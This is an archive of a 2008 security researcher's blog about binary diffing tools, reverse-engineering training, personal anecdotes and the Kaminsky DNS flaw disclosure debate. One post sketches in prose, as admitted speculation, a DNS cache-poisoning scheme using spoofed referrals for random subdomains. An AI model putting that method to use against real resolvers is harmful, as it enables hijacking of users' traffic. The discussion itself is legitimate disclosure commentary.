Friday, December 26, 2008

TAOSSA blog post I didn't see but will comment on :-)

http://taossa.com/index.php/2008/10/13/bugs-vs-flaws/#more-83

I didn't see this post beforehand, and I would like to comment on it (mainly because commenting on his blog post might be the easiest way of getting into a conversation with Mr. McDonald these days ;), but I don't have time right now. Will fix this later this week hopefully.

Sometimes, diffing can remove obfuscation (albeit rarely)

Hey all,

apologies for the sensationalist title, but I found another amusing example today where the same function was present in two different executables -- in two differently obfuscated forms. Amusingly, DiffDeluxe identified the "common components" between these two functions, effectively removing a lot of the obfuscation.


While this is clearly not a typical case, it nonetheless made me smile.

Merry Christmas everyone !

Saturday, November 15, 2008

A good protocol attack ...

... is like a good joke. This one, while requiring special circumstances to succeed with high probability, was responsible for a lot of laughter on my side.

Tuesday, November 11, 2008

BinDiff / BinNavi User Forum

Hey all,

we have re-activated the BinDiff / BinNavi User Forum under

https://zynamics.fogbugz.com/default.asp?BinNavi
https://zynamics.fogbugz.com/default.asp?BinDiff


There is not a whole lot there at the moment, but that should change soon :)

Malicious Office/PDFs

Hey all,

for some research that I'm doing, I'm looking for a collection of malicious Office/PDF documents. If anyone has such documents (e.g. because he was targeted in an attack, or because he found one somewhere), I'd much appreciate submissions ! :)

Monday, November 10, 2008

BinNavi v2 and PHP !

Hey all,

we have written about the SQL storage format for BinNavi quite a few times on this blog, and how we'd like to encourage third parties to use it. I am quite happy to say that Stefan Esser of
SektionEins GmbH has built code to export PHP byte code into the database format. The (cute) results can be seen under

http://www.suspekt.org/2008/11/05/php-bytecode-in-binnavi-20/

Saturday, November 08, 2008

German ways of expressing optimism

One of my favourite things when travelling and interacting people from other cultures is observing differences in conversational conventions -- and (most importantly) different forms and perceptions of "conversational humor". Aside from comedic protocol screw-ups (e.g. literally translating an essentially untranslateable expression to another language, earning -- at best -- puzzled looks and -- at worst -- thoroughly offending the conversation partner), it often provides interesting insights into one's own culture and habits.

This weeks special: German forms of expressing optimism.

There are many expressions in German that are horribly difficult to translate.

One of my favourites that could cause confusion is the German custom of wishing people luck by wishing them "Hals- und Beinbruch!" (literally: 'broken neck and broken leg') or 'Kopf- und Bauchschuss' (literally: 'shot in the head and stomach') or (for sailors) 'Mast- und Schotbruch' (literally: 'broken mast and ripped sail') upon parting.
A common reply for this would be "wird schon schiefgehen" (literally: 'I have no doubt it's going to go badly'). Counterintuitively, the semantics of this is optimistic -- e.g. whoever says that things are going to turn out badly indicates by this that he is not worried, and that he actually expects that things will be fine.

In essence, one expresses optimism by claiming that an improbably horrible outcome is a near-certainty.

Even though I try hard to not have an all-too-obvious German accent any more, I do catch myself all the time in using the above pattern, even though it does not translate. I (deservedly) earned puzzled looks today by clumsily attempting to use the following German saying to indicate my optimism about the future:

"Lächle und sei froh, sagten sie mir, denn es könnte schlimmer kommen. Und ich lächelte und war froh, und es kam schlimmer."

This has a certain elegance in German, which is totally lost in my clumsy translation:

"Smile and be happy, they told me, because things could be a lot worse. So I smiled and was happy, and things got a lot worse."

Aside from the clumsiness of the expression when translated, the semantics (e.g. the intention to express optimism) was thoroughly lost -- the effect was a thoroughly puzzled and slightly worried look by my conversation partner. I think it is situations like these where Germans earn their bad reputation for being thoroughly unfunny.

Other things that are good for causing confusion between a native English speaker who interacts with someone from the German-speaking world are differences when it comes to acceptable replies to the question "How are you ?". The usual form of this in German is "Wie gehts ?", essentially "How is it going ?". In the English speaking world, acceptable replies seem to be restricted to "good", "good good", or "great".

Proper replies to the question "How is it going" over here would be:
"Muss." -- literal translation: 'it has to somehow'
"Naja, ganz ok." -- 'well... ok ...'
"Könnte schlechter/besser gehen" -- 'could be worse/better'
"Bergauf" or "Bergab" -- uphill / downhill

If the other party feels inclined to have a longer chat, they could reply with
"Yesterday, we stood on a cliff. Today we have advanced by a significant step."
or "Katastrophe". This is usually followed with a short anecdote or complaint about something work-related. From a social perspective, this does wonders as an ice-breaker.

Whenever I catch myself in such a situation, I realize that no matter how much one travels, and no matter how much time one spends in a different cultural climate, certain components of the social interaction are nigh-impossible to change.

Anyhow, time to go to sleep.

Sunday, October 26, 2008

The joys of the Volkswagen Caddy Natural Gas car

So I do own a car (contrary to what most people expect). About a year ago, I bought a VW Caddy EcoFuel. It runs on natural gas in normal mode and only uses the gasoline tank for starting (and when the natural gas has run out).

Up until 4 weeks or so ago I was pretty happy with it, but one morning, the car refused to start unless I hit the gas heavily while starting. I brought the car to the repair shop that belongs to the same place where I bought the car. After a few days of tinkering, they told me that
  1. The particular car I own doesn't lock the tank when the rest of the car is locked and
  2. Somebody poured an unidentifiable liquid into my tank causing the problems
  3. Because this is not a problem with the car itself, warranty doesn't cover it
  4. Removing the tank and the fuel pump and cleaning everything is going to cost 1200 EU
I am somewhat annoyed by some punk pouring an unidentifiable liquid into my tank and agree to pay the money. I also ask for the shop to retain a sample of the tank contents so I can at least find out what was poured into the tank, and perhaps get money back from my insurance.

They agree. When I come to pick up the car, the guys at the shop for some bizarre reason cannot find the sample. I sit and wait for ~1 hour, and they finally produce an unlabelled can from somewhere. Ok. I ask them to sign a piece of paper certifying that this sample is coming from my tank, and they tell me they will send it to me via regular mail the next day. So far so good.

So two weeks pass, and I call back 3 times for that piece of paper. At the beginning of the third week, I have to take my guinea pigs to the vet in the morning (yes, I don't only own a car, I also have guinea pigs). On my way back from the vet, the natural gas runs out, and the car switches to gasoline mode -- while I am going about 130km/h with a large truck behind me. The only complication: My engine switches off. Awesome.

So I manage to stop the car safely on the side of the autobahn and get towed to the next Volkswagen shop. About 2 hours after I leave my car there, I get a call from the repair guy there, telling me that they can see in the VW database which repairs were done on my car recently, but from what they can tell, these repairs never happened. They call in an expert that is certified to appear in court to take pictures & write a report, and he also confirms: The tank was never removed, the gasoline pump never replaced, and the 1200 EU were apparently charged without any of the stuff ever happening.

Clearly, I am somewhat surprised. To my dismay, I am also told that the actual repairs will cost about 2000 EU, and that there is still unidentified stuff in my tank.

So all in all, I am currently stuck with
  1. 1200 EU for repairs that never happened
  2. 2000 EU for repairs that are happening now
  3. 2 * 300 EU for chemical analysis of the two samples taken
  4. unspecified legal costs (most likely covered by my insurance) to deal with the situation
All in all, I am quite dissatisfied with VW on this front -- IMO they should've warned me that the tank doesn't lock, and they shouldn't have "VW Certified Repair Shops" that appear to attempt to defraud customers. I have trouble imagining that not actually performing the repairs was an "honest mistake" (although I usually live by the motto that "one should not attribute anything to malice that can be attributed to incompetence").

Anyhow, let's see how this plays out. As if I don't have other stuff to do.

Wednesday, October 15, 2008

For those playing with the printer bug...

... I can't help but post this small PNG. And since blogger rescales/blurs the picture, here is a link to the "full" one.

Sunday, October 05, 2008

My bro's comments on the financial crisis

My brother wrote an article injecting some reality into the discussion about the banking crisis on Spiegel Online. The german version can be seen here. I'll share a short summary of his arguments here (and he'll complain about my distortions later ;).

Short version: The article describes why the situation is less dire than many pundits claim, and explains logical fallacies in commonly-heard arguments.

In the following, here's a summary of his arguments, in the form of "Myth --> Reality"
  1. The US government is taking on a total of 7000bn in liabilities -- about 5500bn by agreeing to step in for Fannie Mae / Freddie Mac, and about 700bn in papers bought by doing the bailout. This equates to roughly half of US GDP, and since the US is already in debt by about 65% of GDP, this would push the total indebtedness of the US to be clearly past 100% of GDP. As a result, serious doubts would have to be cast on the US governments ability to repay debts and service interest on debt.
    Reality: Most of the 5500bn are backed by "proper" mortgages with decent quality. It is unclear whether the US gov will lose money on the Fannie Mae / Freddie Mac deal at all. Even the 700bn in "toxic assets" the US is willing to buy have some underlying value. Realistic expectations at the total loss for the US government in this deal runs in the area of 500bn, which would be less than 3% of GDP -- and therefore not a significant source of problems.
  2. The liquidity that central banks are injecting into the markets should lead to hyperinflation. Reality: The measures to help liquidity in the markets do not increase the money supply in the long run. They are usually short-term credits given to struggling banks for a limited amount of time -- weeks or months. After this time, the creditors have to repay the loans, and the money disappears. At the same time, the willingness by existing banks to lend decreases, thus decreasing the money supply in the economy. The statistics by central banks show that the actual money supply M2 is growing a lot less slowly at the moment in spite of all the liquidity injections. Since the money supply is only growing very slowly at the moment, the inflationary pressures are low.
  3. The banking crisis is responsible for the overall slowdown in the EU's economy, and the German government is thus not responsible for having to adjust their growth estimates downwards sharply.
    Reality: Most indicators show that the slowdown started way before the crisis reached it's current urgence. The indicators started pointing down much earlier as a result of the heavy increase in energy costs, the appreciation of the euro (and the resulting loss in competitiveness), and Germany's botched reform of accounting rules for writing down investments in equipment. The banking crisis is just the latest "kick" -- but the three previous ones were all known early (and could've been partially corrected).
  4. This is the mother of all financial crises. This banking crisis is the worst crisis in several generations, up to the 1930's crash. Reality: Dramatic banking crises are more common than we think. Since 1970, the IWF has counted 42 crashes in countries like Argentina, Indonesia, China, Japan, Finland or Norway. In comparison to these crises, the current crisis isn't even very deep or expensive: The Paulson-bailout comes at a cost of 700bn, not even 5% of GDP, and only a fraction of this will be actually lost. According to the IWF, the average banking crisis in a country came at the cost of 13% of GDP for that country's tax payer. The Indonesian crisis even came in at four times this. The big difference to the other crises is that this one has caught on in the world's biggest economy, and as such reaches unknown dimensions in absolute terms.

Wednesday, October 01, 2008

A few things I forgot to mention :-)

Hey all,

I forgot to mention a few things in the previous post:
  1. We're going to release BinDiff v2.1 on the 15th of October 2008. This is still the "old" diffing engine, albeit with a number of speed & reliability improvements.
  2. We're going to release BinNavi v2.0 on the 15th of October 2008. The number of new features in this release is huge -- it's really quite significant. You can read about it in detail on SP's blog.
    I will post some more information myself in the next days. Just a few mouth-watering keywords: Plugin API to extend Navi from Java/JRuby/Jython/JavaScript, built-in intermediate language, hierarchical tagging / namespaces for structuring large disassemblies, cross-module-graphing, managing multiple address spaces in one project, many user interface improvements, faster IDA->SQL export etc. etc. etc.
  3. The DiffDeluxe engine will be part of the next BinDiff release thereafter, probably no later than February 2008. If you are an existing BinDiff customer and would like to try the DiffDeluxe engine in order to provide us with feedback, do not hesitate to contact us -- it's available for testing now. We're especially interested in finding instances where DiffDeluxe performs worse than BinDiff v2.1. Switching the core diffing engine is a significant change, and I would not want to know of any instances where the new engine is worse than the old one.

Monday, September 29, 2008

Improving Binary Comparison (and it's implication for malware classification)

I am at Virus Bulletin in Ottawa -- if anyone wants to meet to see our new stuff, please drop mail to info@zynamics.com ! :)

It has been a while since I posted here -- partially because I had a lot of work to finish, partially because, after having finished all this work, I took my first long vacation in a ... very long while.

So I am back, and there are a number of things that I am happy to blog about. First of all, I now have in writing that I am officially an MSc in Mathematics. For those that care about obscure things like extending the euclidian algorithm to the ring of boolean functions, you can check the thesis here:
http://www.zynamics.com/files/Diplomarbeit.Thomas.Dullien.Final.pdf

For those that are less crazy about weird computational algebra: Our team here at zynamics has made good progress on improving the core algorithms behind BinDiff further. Our stated goal was to make BinDiff more useful for symbol porting: If you have an executable and you suspect that it might contain a statically linked library for which you have source access (or which you have analyzed before), we want BinDiff to be able to port the symbols into the executable you have, even if the compiler versions and build environments differ significantly, and even if the versions of the library are not quite the same.

Why is this important ? Let's say you're disassembling some piece of network hardware, and you find an OpenSSL-string somewhere in the disassembled image. Let's say you're disassembling an old PIX image (6.34 perhabs) and see the string

OpenSSL 0.9.5a 1 Apr 2000

This implies that PIX contains OpenSSL, and that the guys at Cisco probably backported any fixes to OpenSSL to the 0.9.5a version. Now, it would be fantastic if we could do the following: Compile OpenSSL 0.9.5a with full symbols on our own machine, and then "pull-in" these symbols into our PIX disassembly.

While this was sometimes possible with the BinDiff v2.0 engine (and v2.1, which is still essentially the same engine), the results were often lacking in both speed and accuracy. A few months back, Soeren and I went back to the drawing board and thought about the next generation of our diffing engine -- with specific focus on the ability to compare executables that are "far from each other", that differ significantly in build environments etc. and that only share small parts of their code. The resulting engine (dubbed "DiffDeluxe" by Soeren) is significantly stronger at this task.

Why did the original BinDiff v2 engine perform poorly ? There are a number of reasons to this, but primarily because of the devastating impact that a "false match" can have on further matches in the diffing process, and due to the fact that in the described scenarios, most of the executable is completely different, and only small portions match. The old engine had a tendency to match a few of the "unrelated components" of each executable, and these initial incorrect matches led to further bad matching down the road.

This doesn't mean the BinDiff v2 engine isn't probably the best all-round diffing engine you can find (I think it is, even if some early builds of the v2.0 suffered from silly performance issues -- those of you that are still plagued by this please contact support@ for a fix !) -- but for this particular problem some old architectural assumptions had to be thrown overboard.

Anyhow, to cut a long story short: While the results generated by DiffDeluxe aren't perfect yet, they are very promising. Let's follow our PIX/OpenSSL scenario:

DiffDeluxe operates with two "fuzzy" values for each function match: "Similarity" and "Confidence". Similarity indiciates how successful the matching algorithm was in matching basic blocks and instructions within the two functions, and confidence indicates how "certain" DiffDeluxe is that this match is a correct one. This is useful to sort the "good" and "bad" matches, and to inspect results before porting comments/names. Anyhow, let's look at some high-confidence matches:


Well, one doesn't need to be a rocket scientist to see that these functions match. But in many situations, the similarity between two functions is not 100% evident: The following is a matched function with only 72% similarity (but 92% confidence):



So what is the overall result ? Out of the 3977 functions which we had in libcrypto.so, we were able to match 1780 in our Pix disassembly -- but with a big caveat: A significant number of these have very low similarity and confidence scores. This isn't surprising: The differences between the compiler used upon compile time of our Pix image (sometime 6 years ago ?) and the compiler we used (gcc 4.1, -O3) is drastic. All in all, we end up with around 250 high-confidence matches -- which is not too bad considering that we don't know how many functions from OpenSSL the Pix code actually contains.

In order to have a more clear idea of how well these algorithms perform, we need an example of which we know that essentially the entire library has been statically linked in. For this, luckily, we have Adobe Reader :-)

With all the Adobe patches coming up, let's imagine we'd like to have a look at the Javascript implementation in Acrobat Reader. It can be found in Escript.api. Now, I always presume that everybody else is as lazy as me, so I can't imagine Adobe wrote their own Javascript implementation. But when Adobe added Javascript to Acrobat Reader, there were few public implementations of Javascript around -- essentially only the engine that is nowadays known as "SpiderMonkey", e.g. the Mozilla Javascript engine. So I compiled SpiderMonkey into "libjs.so" on my Linux machine and disassembled Escript.api. Then I ran DiffDeluxe. The result:

Escript contains about 9100 functions, libjs.so contains about 1900. After running the diff, we get 1542 matches. Let's start verifying how "good" these matches are. As discussed above, DiffDeluxe uses a "similarity" and "confidence" score to rate matches. We get 203 matches with similarity and confidence above 90% -- for these functions, we can more or less blindly assume the matches are correct. If we have any doubts, we can inspect them:





























Well, there is little question that this match was accurate.

The interesting question is really: How low can we go similarity- and confidence-wise before the results start deteriorating too badly ? Let's go low -- for similarities below 40%. For example the js_ConcatStrings match.






























Manual inspection of the screenshot on the right will show that the code performs equivalent tasks, but that hardly any instructions remain identical.

Proceeding further down the list of matches, it turns out that results start deteriorating once both confidence and similarity drop below 0.3 -- but we have around 950 matches with higher scores, e.g. we have successfully identified 950 functions in Escript.api. While this is signifcantly less than the 1900 functions that we perhabs could have identified, it is still pretty impressive: After all, we do not know which exact version of SpiderMonkey was used to compile Escript.api, and significant changes could have been made to the code.

Clearly, we're a long way from matching 95% -- but we're very close to the 50% barrier, and will work hard to improve the 50% to 75% and beyond :-)

Anyhow, what does all this have to do with automatic classification and correlation of malware ?

I think the drastic differences induced by platform/compiler changes make it pretty clear that statistical measures that do not focus on the structure and semantics of the executable, but on some "simple" measure like instruction frequencies, fail. All the time. Behaviorial methods might have a role to play, but they will not help you one bit if you acquire memory from a compromised machine, and are trivially obfuscated by adding random noisy OS interaction.

I am happy to kill two birds with one stone: By improving the comparison engine, I am making my life easier when I have to disassemble Pix -- and at the same time, I am improving the our malware classification engine. Yay :-)

Anyhow, as mentioned above: I am at the Virus Bulletin conference -- if anyone wishes to have a chat or have our products demo'ed, please do not hesitate to send mail to info@zynamics.com.

Thursday, July 31, 2008

My 100th blog post, and why my blog entries never have titles.


Hey all, this is my 100th blog post. And again, it has no title. This is not due to me feeling too cool to provide one, it's simply a matter of my "create" window in blogger not having a title field. I don't know why.

Anyhow, the real reason for the blog post: As of today, I'm done with my exams. Which makes me very happy, and will hopefully mean I will get around to blogging more often.

Friday, July 25, 2008

I think everybody should read FX's excellent post.

Tuesday, July 22, 2008

A few short notes on what's being reported:

It seems that after my previous speculation, a few unforeseen things happened:
  • Apparently, my post, while partially incorrect, was somewhere close to the truth
  • A third party accidentally posted full details on the issue, which corrected my mistakes. Shortly after posting these details, the post was pulled down again, but was archived by search engines (and those that had subscribed to the blog where it was posted).
There have been a number of slightly incorrect press reports which I'd like to clarify:
  • I posted a partially incorrect, but close, guess on what the DNS issue might be. That is not the same as "publishing a reliable way to poison DNS". It is guessing how it might be done.
  • I did not pull down any posts from my blog.
I do not think anything I have posted takes away from Dan's superb work on this issue. Some people are of the opinion that I "stole his thunder" for his Blackhat talk, and I disagree strongly: Dan's talk is a full hour on DNS, and all the interesting things within DNS. My post was a vague guess.

Imagine: A world-renowned particle physics expert decides to give a one-hour lecture in your hometown, and on your way there some guy on the street tells you "I think he will talk about (...30 seconds of physics here...)". Would you decide that listening to the physics expert talk is no longer necessary because the guy on the street told you everything ?

Also: Guessing how something is done knowing it can be done is easy. Dan did the hard part: Coming up with a clever attack in a protocol that is relied on everywhere. My guess doesn't come close to comparing to what Dan has done: He spotted something that everyone else missed beforehand. He also handled the entire situation with a lot of endurance, patience, and determination. We disagree on whether people have a right (or even duty) to discuss what the issue might be, but that doesn't mean that I do not have the greatest respect for Dan. And his talk will contain much more of interest than my silly 30 lines.

I think (German news site) Heise summed it up well:
"In fact, all of Dullien's hunches had already been sketched out the day that US-CERT published a vulnerability note on the security hole."

I guessed. I was close, perhabs closer than others, but no cigar.

Monday, July 21, 2008

On Dan's request for "no speculation please"

I know that Dan asked the public researchers to "not speculate publicly" about the vulnerability, in order to buy people time. This is a commendable goal. I respect Dans viewpoint, but I disagree that this buys anyone time (more on this below). I am fully in agreement with the entire way he handled the vulnerability (e.g. getting the vendors on board, getting the patches made and released, and I understand his decision not to disclose extra information) except the proposed "discussion blackout".

In a strange way, if nobody speculates publicly, we are pulling wool over the eyes of the general public, and ourselves. Consider the following:

Let's assume that the DNS problem is sufficiently complicated that an average person that has _some_ background in security, but little idea of protocols or DNS, would take N days to figure out what is problem is.
So clearly, the assumption behind the "discussion blackout" is that no evil person will figure it out before the end of the N days.

Let's say instead of having an average person with _some_ background in security, we have a particularly bright evil person. Perhaps someone whose income depends on phishing, and who is at the same time bright enough to build a reasonably complicated rootkit. This person is smart, and has a clear financial incentive to figure this out. I'd argue that it would take him N/4 days.

By asking the community not to publicly speculate, we make sure that we have no idea what N actually is. We are not buying anybody time, we are buying people a warm and fuzzy feeling.

It is imaginable that N is something like 4 days. We don't know, because there's no public speculation.

So in that case, we are giving people 29 days of "Thank us for buying you time.", when in fact we have bought them a false perception of having time. The actual time they have is N/4th, and we're just making sure they think that N/4th > 30. Which it might not be. It might be ... 1.

It all reminds me of a strange joke I was told last week. It's a russian joke that makes fun of the former east german government, so it might not be funny to everyone. I apologize up front: I am both german and a mathematician, so by definition the following can't be funny.

"Lenin travels with the train through Russia, and the train grinds to a halt. Engine failure. Lenin sends all workers in the factory that might be responsible to a labor camp.

Stalin travels with the train through Russia a few years later, and the train grinds to a halt. Engine failure. Stalin has all workers in the factory that might be responsible shot.

Honecker (the former head of State of the GDR) travels with the train through Russia. The train grinds to a halt. Engine failure. Honecker has a brilliant idea: "The people that are responsible should be forced to rock the train, so we can sit inside and feel like it is still running." "

It feels like we're all trying to rock the train.

If there was public speculation, we'd at least get a lower boundary on the "real" N, not the N we wish for.

So I will speculate.

The last weeks I was in the middle of preparing for an exam, so I really didn't have time to spend on the DNS flaw. I couldn't help myself though and spent a few minutes every other evening or so reading a DNS-for-dummies-text. I have done pretty much no protocol work in my life, so I have little hope for having gotten close to the truth.

As such, anyone with a clue will probably laugh at my naive ideas. Here's my speculation:

Mallory wants to poison DNS lookups on server ns.polya.com for the domain www.gmx.net. The nameserver
for gmx.net is ns.gmx.net. Mallory's IP is 244.244.244.244.

Mallory begins to send bogus requests for www.ulam00001.com, www.ulam00002.com ... to ns.polya.com.
ns.polya.com doesn't have these requests cached, so it asks a root server "where can I find the .com NS?"
It then receives a referral to the .com NS. It asks the nameserver for .com where to find the nameserver for ulam00001.com, ulam00002.com etc.

Mallory spoofs referrals claiming to come from the .com nameserver to ns.polya.com. In these referrals, it says that the nameserver responsible for ulamYYYYY.com is a server called ns.gmx.net and that this server is located at 244.244.244.244. Also, the time to live of this referral is ... long ...

Now eventually, Mallory will get one such referral spoofed right, e.g. the TXID etc. will be guessed properly.

ns.polya.com will then cache that ns.gmx.net can be found at ... 244.244.244.244. Yay.

The above is almost certainly wrong. Can someone with more insight into DNS tell me why it won't work ?

Sunday, July 13, 2008

*Blogspam*
Advanced Reverse Engineering Trainings Class

We still have a number of seats in our advanced RE class available. The class
will be held on the following three days:
  1. Wednesday the 1st of October
  2. Thursday the 2nd of October
  3. Friday the 3rd of October
The class will be held in Frankfurt(Main) in Germany.
The class is limited to 17 students and will cover a lot of interesting ground. Amongst the things we will be teaching are:
  • What a C++ compiler does and how to recognize these things in a binary:
    • How to recover classes and inheritance,
    • What templates will do in the binary
    • Using the helping hand of MS RTTI to recover classnames and generate inheritance diagrams from the binary
  • Getting the most out of the RE-DB SQL schema -- storing disassemblies in a uniform way in a database
  • Differential debugging and isolation of security-critical features (e.g. "where in the world is the encryption code again ?")
  • Crafting malicious input to reach target program locations
  • Working on network infrastructure:
    • Loading ROM images into IDA: IOS, Netscreen etc.
    • Generic methods of identifying the base address
    • Debugging IOS (and other network infrastructure) using BinNavi and the GDB protocol
  • Using BinDiff to full advantage:
    • Patch Diffing
    • Porting comments & names
    • Porting symbols of statically linked libraries (such as OpenSSL) back into your disassembly
  • A reverse engineer's guide to static analysis:
    • The reverse engineering intermediate language REIL
    • Monotone frameworks, lattices, and fun things to do with them
  • Lots and lots of fun things to do with Python
The class will be taught by me (Halvar Flake), Ero Carrera, and Felix 'Fx' Lindner.

The class will be held in a small Hotel called "Villa Orange" -- which has about 20 rooms, so usually the entire Hotel consists of reverse engineers.

For more info, visit
http://www.zynamics.com/index.php?page=trainings

Cheers,
Halvar
PS: It might be of interest to some readers that the Oktoberfest is from the 20th of September to the 5th of October this year -- this means you can either attend Octoberfest before or after the trainings class (although we recommend the latter).
*End of Blogspam*
Hey all,

> Supplemental note to Halvar & everybody else who has said, in effect, "this
> is why SSL was invented" -- there's more to internet security than the route
> from your computer to your online bank. Have you thought about what this
> bug implies for NTLM? Or every virgin OS installation on the planet? Or
> Google's entire business model?

just to clarify: I did not say this bug wasn't relevant, and I don't want my blog post to be construed
in that manner. What I did say was:

  1. The average user always has to assume that his GW is owned, hence nothing changes for him. Specifically: He does not need to worry more than usual. Check SSL certificates, check host fingerprints. Don't use plaintext protocols.
  2. For those providing DNS services, it is clearly preferrable to patch. A DNS system without trivial poisoning is preferrable to one with trivial poisoning.
  3. In living memory, we have survived repeated Bind remote exploits, SSH remote exploits, a good number of OpenSSL remote exploits etc. -- I argue that the following inequality holds:
  4. OpenSSL remote >= OpenSSH remote > Bind remote > easy DNS poisoning
  5. I argue this because the left-hand side usually implies the right-hand side given some time & creativity.
The net has survived much worse.

So I guess summary is: Good find, definitely useful for an attacker, but we have survived much worse without a need for the great-vendor-coordination jazz.

Cheers,
Halvar
PS: I am aware that my sangfroid could be likened to a russian roulette player, that after winning 4 games concludes: "This game clearly isn't dangerous."
PPS: It seems that we will find many more critical issues in DNS over the next weeks - it's the first time in years that a significant quantity of people look at the protocol / implementations.

Thursday, July 10, 2008

All this DNS ...

I am taking a very brief break from my books to write a few thoughts about this entire DNS thing that everybody seems to be writing about. And reading all this, I can't help but feel like the only one in the room that doesn't understand the joke.

So Dan Kaminsky found a serious flaw in the implementation of the DNS protocol, apparently allowing DNS cache poisoning. This is good work.

I fail to understand the seriousness with which this bug is handled though. Anybody who uses the Internet has to assume that his gateway is owned. That is why we have SSL, that is why we have certificates, that is why SSH tells you when the host key changes. DNS can never be trusted - you always have to assume that your ISP's admin runs a broken filesharing server on the same box with BIND.

If it were legitimate to operate under the assumption that your gateway is not owned, you would not need SSH, or SSL. If I could operate under the assumption that my gateway wasn't owned, I could TELNET everywhere, and transmit my credit card details in the clear.

I am not saying that Dan's bug doesn't have utility for an attacker -- it's definitely more comfortable/less time consuming to do DNS poisoning than to own the gateway. But for the user, nothing changes, irrespective of whether the patch was applied or not. The basic assumption is always my gateway is controlled by my opponent.

I personally think we've seen much worse problems than this in living memory. I'd argue that the Debian Debacle was an order of magnitude (or two) worse, and I'd argue that OpenSSH bugs a few years back were worse.

So, let's calm down everybody. And I'd even argue that installing the patches is a lot less time-critical (for the user) than in most other scenarios. If you act under the assumption of "my gateway is owned", this should be no risk to you.

Wednesday, July 02, 2008

The security book that I'd like to see written (and which I'd buy)

Good security books are few and far between. But IF someone writes the following book, I'll pre-order it immediately, even if it costs a hundred dollars:

"100 UNIX commands to issue on other people's systems"

Generally, I am horrible at all things *nix, and there are few enough good books around which teach you clever things to do with a shell. Unfortunately, there is no book that teaches people what to do with a shell on someone else's box.

Someone from Matasano told me they'd post their favourite commands if I wrote this blog post - so let's see it ! :)

(I'd like to start this by posting, but honestly -- I wouldn't be asking if I knew anything I'd not be embarrassed about. I mentioned above that I suck at all things *nix)

Saturday, June 28, 2008

The RE-DB database format for storing disassemblies

For those of you that are interested in the disassembly database schema discussed here (amongst other places), there is a mailing list for discussion of it now. More information about the ML:
  http://lists.immunityinc.com/mailman/listinfo/re-db

Sunday, June 15, 2008

Intuition, Experience, and the value of getting Pwned

The following is to be taken mostly proverbially. Names have been changed, primarily to protect my bruised ego.

There are few things that I hate more than looking stupid or incompetent. At the same time I like trying new things (and this rarely happens without falling flat on your face a couple of dozen times). As a result, I usually do not advertise that I do something before I haven't gotten some confidence in at least not being significantly worse than average.

So tonight, I had my first free evening in a few weeks. I decided I'd go follow one of my not-publicly-advertised hobbies. I found a place to go, and thought that I was good enough to play.

I got pwned, and it wasn't pretty.

There are many different ways of competing and losing. Whenever this happens, it happens with a certain "delta" -- the skill gap between you and your opponent(s). Small deltas usually trigger a reaction of "get up, try again" in me.

Tonight, the delta between me and the weakest competitor was such a gulf that - within minutes - it was clear that I should practice a few more years before I contemplate coming back. I will not even describe what the delta between me and the stronger competitors was.

Getting knocked down has one great benefit: After you have been knocked down and realized that there is no sense in getting up quickly, you have a few minutes of extraordinary calm to contemplate the situation - your skill level, your competitors' skill level, the value of experience and intuition.

No matter how much work you put into something, and no matter how much talent you have, intuition and experience have tremendous value. And they are nigh-impossible to teach, and to accumulate quickly.

What is intuition ? What is its relation to experience ?

Intuition is what one bases decisions on when knowledge fails. In any field, there are situations where decisions have to be made with very imperfect and incomplete information. Intuition is what we rely on when we don't know anything.

Intuition is usually based on experience - but whereas one can easily talk about "experiences" (they can be recalled usually), talking about the reasoning behind an intuition is often difficult. If one believes in the theory of two brain hemispheres, intuition lives deeply in the nonverbal part of your brain.

When I teach classes, or do collaborative code audits, or when I do some sorts of math, I end up in situations where I have a "feeling" about how things "should" be. This feeling is both tremendously useful and horribly frustrating for students and coworkers. The difficulty of verbalizing all the bits that feed an intuition makes it difficult to follow.

If someone has sufficient experience in a field, some of the things he does seem like magic. My competitors this evening clearly did things I had never seen before, and did so quite well.

Perhabs a skill can be described as a simple real-valued function.

Your innate talent and your work investment influence the slope, and the value of the function at a particular point tells you your current direct "knowledge" of a field. Intuition must then be something that is based on the accumulated area under the curve.

In many situations, it might be possible to catch up with someone experienced on a particular topic in a limited timeframe - but catching up with the value of your "function" is only half the game. You'll have to outperform someone for quite a while before your accumulated "area" exceeds his.

Anyhow, the one thing that I tell myself to get over this is that I was the youngest man in the room by a gap of about 10 years. So I'd like to tell myself that, given that extra 10 years, I could actually compete.

There's one caveat though: There were several women that were younger than me, and the delta to them was no less than to any of the men.

I apologize for the excessive vagueness of this post.
Travelling & Dopplr

Btw, how many people that travel a lot are using Dopplr ? It seems like
a somewhat clever idea (as I am stuck in silly hotel rooms a lot and
often wonder wether anyone I know is nearby).

Thursday, June 12, 2008

Zynamics Canada Tour, Complex analysis and my stupidity

Hey all -- I know I've been mostly quiet the last weeks. This was principally due to the combination of lots of work at work (the secretary is on vacation) and me having to take a couple of exams.

I can proudly proclaim that I passed my complex analysis / riemann surfaces exam today. I am not so proud of my performance -- some of the mistakes I made deserve getting my shins kicked. The final grade was pretty ok, I just really hate looking stupid in front of people I deem smart.

Anyhow, on to other news:

It's RECon time, and while I cannot attend due to a number of other obligations :-( our BinNavi lead developer Sebastian is attending. So if anyone that is attending RECon would like to have a demo of BinNavi v1.5 OR discuss the cool new things that BinNavi v2 will bring, make sure to drop info@zynamics.com a mail so that we can schedule something.

Monday, April 28, 2008

There's a lot of hoopla in German media about the german SIGINT folks having to admit that they trojanized Afghanistan's Ministry of Commerce and Industry.

The entire situation is hilarious, as Mrs. Merkel criticized the chinese for having sponsored hacking sprees into German government institutions last year - I guess she is not overly happy about all this stuff hitting the press now.

The first article is actually quite interesting. It is terribly hard to get any information about InfoSec stuff in Europe (we'd need a Mr. Bamford around here I fear), so the article is really amongst the only data points to be found.
In 2006, Division 2 consisted of 13 specialist departments and a management team (Department 20A), employing about 1,000 people. The departments are known by their German acronyms, like MOFA (mobile and operational telecommunications intelligence gathering), FAKT (cable telecommunications intelligence gathering) and OPUS (operational support and wiretapping technology).
So there are people working on this sort of stuff in Germany after all. I wonder why one never meets any at any security conferences - they either have excellent covers or no budget to travel to any conferences.

Another amusing tidbit:
Perhaps it will never be fully clear why the BND chose this particular ministry and whether other government agencies in Kabul were also affected -- most of the files relating to the case have apparently been destroyed.
I find the regularity with which important files regarding espionage or KSK misbehavior are destroyed or lost a little bit ... peculiar.

There's a bit in the article about emails that have a .de domain ending being automatically discarded by their surveillance tools. Hilarious.

